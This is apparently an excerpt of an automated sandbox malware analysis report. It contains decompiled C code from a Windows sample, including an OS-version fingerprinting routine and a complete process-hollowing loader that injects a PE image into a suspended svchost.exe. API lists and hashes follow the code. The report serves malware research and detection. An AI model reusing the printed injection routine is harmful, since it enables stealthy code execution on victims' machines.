                                                                                                                                                                                                                                                                                                        								if((_v50 & 0x000000ff) != 1 || (_v44.dwOemId & 0x0000ffff) != 9) {
                                                                                                                                                                                                                                                                                                        									if(GetSystemMetrics(0x59) != 0) {
                                                                                                                                                                                                                                                                                                        										if(GetSystemMetrics(0x59) == 0) {
                                                                                                                                                                                                                                                                                                        											if((_v52 & 0x8000) != 0) {
                                                                                                                                                                                                                                                                                                        												lstrcatA(_a4, "WinHomeServer");
                                                                                                                                                                                                                                                                                                        												 *_a12 = 4;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											lstrcatA(_a4, "WinServer2003R2");
                                                                                                                                                                                                                                                                                                        											 *_a12 = 6;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										lstrcatA(_a4, "WinServer2003");
                                                                                                                                                                                                                                                                                                        										 *_a12 = 5;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									lstrcatA(_a4, "WinXP64");
                                                                                                                                                                                                                                                                                                        									 *_a12 = 3;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							lstrcatA(_a4, "WinXP");
                                                                                                                                                                                                                                                                                                        							 *_a12 = 2;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						lstrcatA(_a4, "Win2K");
                                                                                                                                                                                                                                                                                                        						 *_a12 = 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L38;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}








                                                                                                                                                                                                                                                                                                        0x04008f89
                                                                                                                                                                                                                                                                                                        0x04008f94
                                                                                                                                                                                                                                                                                                        0x0400927b
                                                                                                                                                                                                                                                                                                        0x04009281
                                                                                                                                                                                                                                                                                                        0x04008fae
                                                                                                                                                                                                                                                                                                        0x04008fce
                                                                                                                                                                                                                                                                                                        0x04008fd6
                                                                                                                                                                                                                                                                                                        0x04008fe8
                                                                                                                                                                                                                                                                                                        0x04008fff
                                                                                                                                                                                                                                                                                                        0x04009266
                                                                                                                                                                                                                                                                                                        0x0400926a
                                                                                                                                                                                                                                                                                                        0x04009275
                                                                                                                                                                                                                                                                                                        0x04009275
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400926a
                                                                                                                                                                                                                                                                                                        0x04009009
                                                                                                                                                                                                                                                                                                        0x04009016
                                                                                                                                                                                                                                                                                                        0x0400911c
                                                                                                                                                                                                                                                                                                        0x04009129
                                                                                                                                                                                                                                                                                                        0x0400917b
                                                                                                                                                                                                                                                                                                        0x040091ca
                                                                                                                                                                                                                                                                                                        0x040091d3
                                                                                                                                                                                                                                                                                                        0x040091f6
                                                                                                                                                                                                                                                                                                        0x04009201
                                                                                                                                                                                                                                                                                                        0x0400920a
                                                                                                                                                                                                                                                                                                        0x0400920a
                                                                                                                                                                                                                                                                                                        0x040091d5
                                                                                                                                                                                                                                                                                                        0x040091de
                                                                                                                                                                                                                                                                                                        0x040091e7
                                                                                                                                                                                                                                                                                                        0x040091e7
                                                                                                                                                                                                                                                                                                        0x040091d3
                                                                                                                                                                                                                                                                                                        0x0400917d
                                                                                                                                                                                                                                                                                                        0x04009184
                                                                                                                                                                                                                                                                                                        0x040091a7
                                                                                                                                                                                                                                                                                                        0x040091b2
                                                                                                                                                                                                                                                                                                        0x040091bb
                                                                                                                                                                                                                                                                                                        0x040091bb
                                                                                                                                                                                                                                                                                                        0x04009186
                                                                                                                                                                                                                                                                                                        0x0400918f
                                                                                                                                                                                                                                                                                                        0x04009198
                                                                                                                                                                                                                                                                                                        0x04009198
                                                                                                                                                                                                                                                                                                        0x040091c1
                                                                                                                                                                                                                                                                                                        0x0400912b
                                                                                                                                                                                                                                                                                                        0x04009132
                                                                                                                                                                                                                                                                                                        0x04009155
                                                                                                                                                                                                                                                                                                        0x04009160
                                                                                                                                                                                                                                                                                                        0x04009169
                                                                                                                                                                                                                                                                                                        0x04009169
                                                                                                                                                                                                                                                                                                        0x04009134
                                                                                                                                                                                                                                                                                                        0x0400913d
                                                                                                                                                                                                                                                                                                        0x04009146
                                                                                                                                                                                                                                                                                                        0x04009146
                                                                                                                                                                                                                                                                                                        0x0400916f
                                                                                                                                                                                                                                                                                                        0x04009129
                                                                                                                                                                                                                                                                                                        0x04009210
                                                                                                                                                                                                                                                                                                        0x04009217
                                                                                                                                                                                                                                                                                                        0x04009222
                                                                                                                                                                                                                                                                                                        0x04009222
                                                                                                                                                                                                                                                                                                        0x04009237
                                                                                                                                                                                                                                                                                                        0x04009242
                                                                                                                                                                                                                                                                                                        0x04009253
                                                                                                                                                                                                                                                                                                        0x04009253
                                                                                                                                                                                                                                                                                                        0x04009263
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04009263
                                                                                                                                                                                                                                                                                                        0x04009023
                                                                                                                                                                                                                                                                                                        0x04009049
                                                                                                                                                                                                                                                                                                        0x0400906f
                                                                                                                                                                                                                                                                                                        0x0400907c
                                                                                                                                                                                                                                                                                                        0x040090ab
                                                                                                                                                                                                                                                                                                        0x040090d1
                                                                                                                                                                                                                                                                                                        0x040090f6
                                                                                                                                                                                                                                                                                                        0x04009101
                                                                                                                                                                                                                                                                                                        0x0400910a
                                                                                                                                                                                                                                                                                                        0x0400910a
                                                                                                                                                                                                                                                                                                        0x040090d3
                                                                                                                                                                                                                                                                                                        0x040090dc
                                                                                                                                                                                                                                                                                                        0x040090e5
                                                                                                                                                                                                                                                                                                        0x040090e5
                                                                                                                                                                                                                                                                                                        0x040090ad
                                                                                                                                                                                                                                                                                                        0x040090b6
                                                                                                                                                                                                                                                                                                        0x040090bf
                                                                                                                                                                                                                                                                                                        0x040090bf
                                                                                                                                                                                                                                                                                                        0x04009087
                                                                                                                                                                                                                                                                                                        0x04009090
                                                                                                                                                                                                                                                                                                        0x04009099
                                                                                                                                                                                                                                                                                                        0x04009099
                                                                                                                                                                                                                                                                                                        0x0400907c
                                                                                                                                                                                                                                                                                                        0x0400904b
                                                                                                                                                                                                                                                                                                        0x04009054
                                                                                                                                                                                                                                                                                                        0x0400905d
                                                                                                                                                                                                                                                                                                        0x0400905d
                                                                                                                                                                                                                                                                                                        0x04009025
                                                                                                                                                                                                                                                                                                        0x0400902e
                                                                                                                                                                                                                                                                                                        0x04009037
                                                                                                                                                                                                                                                                                                        0x04009037
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04009110

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetVersionExA.KERNEL32(0000009C), ref: 04008FF7
                                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 04009009
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,Win2K), ref: 0400902E
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,WinXP), ref: 04009054
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,Vista), ref: 0400913D
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,WinServer2008), ref: 04009160
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,WinServer2008R2), ref: 0400918F
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,Win7), ref: 040091B2
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,WinServer2012), ref: 040091DE
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,Win8), ref: 04009201
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,_x64), ref: 04009222
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0400922F
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,0400C980), ref: 04009242
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 04009253
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0400925D
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 04009275
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrcat$lstrlen$InfoSystemVersion
                                                                                                                                                                                                                                                                                                        • String ID: UndefinedOS$Vista$Win2K$Win7$Win8$WinHomeServer$WinServer2003$WinServer2003R2$WinServer2008$WinServer2008R2$WinServer2012$WinXP$WinXP64$_x64
                                                                                                                                                                                                                                                                                                        • API String ID: 3139318632-332591429
                                                                                                                                                                                                                                                                                                        • Opcode ID: b80c610fb93e26c1f6b8a0e3d57eccb9ead3b078b5df3064abf97d281ea2cf4c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2fdea20511d00b83c143a5217ffb9651c4d2114897e9ccdf2931e29d93762e72
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b80c610fb93e26c1f6b8a0e3d57eccb9ead3b078b5df3064abf97d281ea2cf4c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A81F9B4644209EBFB249F60C849BAE7BB5FB49301F00C659F905BA2C1D779E9C1CB61
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E040020B0(intOrPtr _a4, signed char _a8, CHAR* _a12) {
                                                                                                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                                                                                                                        				struct _CONTEXT _v996;
                                                                                                                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v1012;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1016;
                                                                                                                                                                                                                                                                                                        				struct _STARTUPINFOA _v1092;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1096;
                                                                                                                                                                                                                                                                                                        				void _v1100;
                                                                                                                                                                                                                                                                                                        				signed int _v1104;
                                                                                                                                                                                                                                                                                                        				CHAR* _t121;
                                                                                                                                                                                                                                                                                                        				void* _t128;
                                                                                                                                                                                                                                                                                                        				int _t130;
                                                                                                                                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                                                                                                                                        				int _t140;
                                                                                                                                                                                                                                                                                                        				int _t143;
                                                                                                                                                                                                                                                                                                        				int _t145;
                                                                                                                                                                                                                                                                                                        				int _t148;
                                                                                                                                                                                                                                                                                                        				void* _t263;
                                                                                                                                                                                                                                                                                                        				void* _t265;
                                                                                                                                                                                                                                                                                                        				void* _t266;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0) {
                                                                                                                                                                                                                                                                                                        					L26:
                                                                                                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				GetEnvironmentVariableA("SystemRoot",  &_v276, 0x104);
                                                                                                                                                                                                                                                                                                        				_t121 = lstrcatA( &_v276, "\\system32\\svchost.exe");
                                                                                                                                                                                                                                                                                                        				if(_a12 != 0) {
                                                                                                                                                                                                                                                                                                        					lstrcatA( &_v276, " ");
                                                                                                                                                                                                                                                                                                        					_t121 = lstrcatA( &_v276, _a12);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				E04007D20(_t121,  &_v1012, 0, 0x10);
                                                                                                                                                                                                                                                                                                        				E04007D20( &_v1092,  &_v1092, 0, 0x44);
                                                                                                                                                                                                                                                                                                        				_t265 = _t263 + 0x18;
                                                                                                                                                                                                                                                                                                        				_v1092.cb = 0x44;
                                                                                                                                                                                                                                                                                                        				_v1096 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                                                        				_v1016 = _v1096 + ( *(_v1096 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                                                        				_v8 =  *((intOrPtr*)(_v1096 + 0x50));
                                                                                                                                                                                                                                                                                                        				_t128 = VirtualAlloc(0, _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                                                        				_v12 = _t128;
                                                                                                                                                                                                                                                                                                        				if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        					_t130 = CreateProcessA(0,  &_v276, 0, 0, 0, 4, 0, 0,  &_v1092,  &_v1012); // executed
                                                                                                                                                                                                                                                                                                        					if(_t130 != 0) {
                                                                                                                                                                                                                                                                                                        						_t132 = VirtualAllocEx(_v1012.hProcess,  *(_v1096 + 0x34), _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                                                        						_v1100 = _t132;
                                                                                                                                                                                                                                                                                                        						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                                                        							L10:
                                                                                                                                                                                                                                                                                                        							E04007B70(_v12, _a4,  *((intOrPtr*)(_v1096 + 0x54)));
                                                                                                                                                                                                                                                                                                        							_t266 = _t265 + 0xc;
                                                                                                                                                                                                                                                                                                        							_v1104 = 0;
                                                                                                                                                                                                                                                                                                        							while(_v1104 < ( *(_v1096 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                                        								if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        									E04007B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                                                        									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									E04007B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0x14 + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                                                        									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v1104 = _v1104 + 1;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							E040026D0(_v12, _v1100);
                                                                                                                                                                                                                                                                                                        							_t140 = WriteProcessMemory(_v1012.hProcess, _v1100, _v12, _v8, 0); // executed
                                                                                                                                                                                                                                                                                                        							if(_t140 != 0) {
                                                                                                                                                                                                                                                                                                        								VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        								_v996.ContextFlags = 0x10007;
                                                                                                                                                                                                                                                                                                        								_t143 = GetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                                                        								if(_t143 != 0) {
                                                                                                                                                                                                                                                                                                        									_t145 = WriteProcessMemory(_v1012.hProcess, _v996.Ebx + 8,  &_v1100, 4, 0); // executed
                                                                                                                                                                                                                                                                                                        									if(_t145 != 0) {
                                                                                                                                                                                                                                                                                                        										_v996.Eax = _v1100 +  *((intOrPtr*)(_v1096 + 0x28));
                                                                                                                                                                                                                                                                                                        										_t148 = SetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                                                        										if(_t148 == 0) {
                                                                                                                                                                                                                                                                                                        											TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                                        											CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                                        											CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                                                        											goto L26;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										ResumeThread(_v1012.hThread); // executed
                                                                                                                                                                                                                                                                                                        										return _v1012.hProcess;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                                        									CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                                                        									CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                                        									return 0;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                                        								CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                                                        								CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                                        								return 0;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                                        							CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                                                        							CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                                        							VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        							return 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v1100 = VirtualAllocEx(_v1012.hProcess, 0, _v8, 0x103000, 0x40);
                                                                                                                                                                                                                                                                                                        						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                                                        							goto L10;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                                        						CloseHandle(_v1012);
                                                                                                                                                                                                                                                                                                        						CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                                        						VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}
























                                                                                                                                                                                                                                                                                                        0x040020bd
                                                                                                                                                                                                                                                                                                        0x04002502
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04002502
                                                                                                                                                                                                                                                                                                        0x040020d4
                                                                                                                                                                                                                                                                                                        0x040020e6
                                                                                                                                                                                                                                                                                                        0x040020f0
                                                                                                                                                                                                                                                                                                        0x040020fe
                                                                                                                                                                                                                                                                                                        0x0400210f
                                                                                                                                                                                                                                                                                                        0x0400210f
                                                                                                                                                                                                                                                                                                        0x04002120
                                                                                                                                                                                                                                                                                                        0x04002133
                                                                                                                                                                                                                                                                                                        0x04002138
                                                                                                                                                                                                                                                                                                        0x0400213b
                                                                                                                                                                                                                                                                                                        0x0400214e
                                                                                                                                                                                                                                                                                                        0x04002168
                                                                                                                                                                                                                                                                                                        0x04002177
                                                                                                                                                                                                                                                                                                        0x04002187
                                                                                                                                                                                                                                                                                                        0x0400218d
                                                                                                                                                                                                                                                                                                        0x04002194
                                                                                                                                                                                                                                                                                                        0x040021c0
                                                                                                                                                                                                                                                                                                        0x040021c8
                                                                                                                                                                                                                                                                                                        0x040021fe
                                                                                                                                                                                                                                                                                                        0x04002204
                                                                                                                                                                                                                                                                                                        0x04002211
                                                                                                                                                                                                                                                                                                        0x0400227d
                                                                                                                                                                                                                                                                                                        0x0400228f
                                                                                                                                                                                                                                                                                                        0x04002294
                                                                                                                                                                                                                                                                                                        0x04002297
                                                                                                                                                                                                                                                                                                        0x040022b2
                                                                                                                                                                                                                                                                                                        0x040022ce
                                                                                                                                                                                                                                                                                                        0x0400235e
                                                                                                                                                                                                                                                                                                        0x04002363
                                                                                                                                                                                                                                                                                                        0x040022d0
                                                                                                                                                                                                                                                                                                        0x04002312
                                                                                                                                                                                                                                                                                                        0x04002317
                                                                                                                                                                                                                                                                                                        0x04002317
                                                                                                                                                                                                                                                                                                        0x040022ac
                                                                                                                                                                                                                                                                                                        0x040022ac
                                                                                                                                                                                                                                                                                                        0x04002376
                                                                                                                                                                                                                                                                                                        0x04002396
                                                                                                                                                                                                                                                                                                        0x0400239e
                                                                                                                                                                                                                                                                                                        0x040023ec
                                                                                                                                                                                                                                                                                                        0x040023f2
                                                                                                                                                                                                                                                                                                        0x0400240a
                                                                                                                                                                                                                                                                                                        0x04002412
                                                                                                                                                                                                                                                                                                        0x04002460
                                                                                                                                                                                                                                                                                                        0x04002468
                                                                                                                                                                                                                                                                                                        0x040024a6
                                                                                                                                                                                                                                                                                                        0x040024ba
                                                                                                                                                                                                                                                                                                        0x040024c2
                                                                                                                                                                                                                                                                                                        0x040024e2
                                                                                                                                                                                                                                                                                                        0x040024ef
                                                                                                                                                                                                                                                                                                        0x040024fc
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040024fc
                                                                                                                                                                                                                                                                                                        0x040024cb
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040024d1
                                                                                                                                                                                                                                                                                                        0x04002473
                                                                                                                                                                                                                                                                                                        0x04002480
                                                                                                                                                                                                                                                                                                        0x0400248d
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04002493
                                                                                                                                                                                                                                                                                                        0x0400241d
                                                                                                                                                                                                                                                                                                        0x0400242a
                                                                                                                                                                                                                                                                                                        0x04002437
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400243d
                                                                                                                                                                                                                                                                                                        0x040023a9
                                                                                                                                                                                                                                                                                                        0x040023b6
                                                                                                                                                                                                                                                                                                        0x040023c3
                                                                                                                                                                                                                                                                                                        0x040023d4
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040023da
                                                                                                                                                                                                                                                                                                        0x0400222d
                                                                                                                                                                                                                                                                                                        0x0400223a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04002245
                                                                                                                                                                                                                                                                                                        0x04002252
                                                                                                                                                                                                                                                                                                        0x0400225f
                                                                                                                                                                                                                                                                                                        0x04002270
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04002276
                                                                                                                                                                                                                                                                                                        0x040021d5
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04002196
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04002196

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 040020D4
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,\system32\svchost.exe), ref: 040020E6
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,0400C38C), ref: 040020FE
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0400210F
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04002187
                                                                                                                                                                                                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 040021C0
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040021D5
                                                                                                                                                                                                                                                                                                        • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 040021FE
                                                                                                                                                                                                                                                                                                        • VirtualAllocEx.KERNEL32(?,00000000,?,00103000,00000040), ref: 04002227
                                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 04002245
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 04002252
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0400225F
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002270
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                                                                        • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                                                                        • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                                                                        • Opcode ID: 618df5bf54c1a5a0a6d1612c0a6f02d09146bff70f4639aa179a0dfbd2a6d315
                                                                                                                                                                                                                                                                                                        • Instruction ID: 24de31acf85f81f6cd7956eb3c6d21bf067972eab508d3ad9c1f9881985dd567
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 618df5bf54c1a5a0a6d1612c0a6f02d09146bff70f4639aa179a0dfbd2a6d315
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27D13F71A44215ABEB28DF54CC94FAE77B9FB48304F0486D8F609B7281D678AE80CF55
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
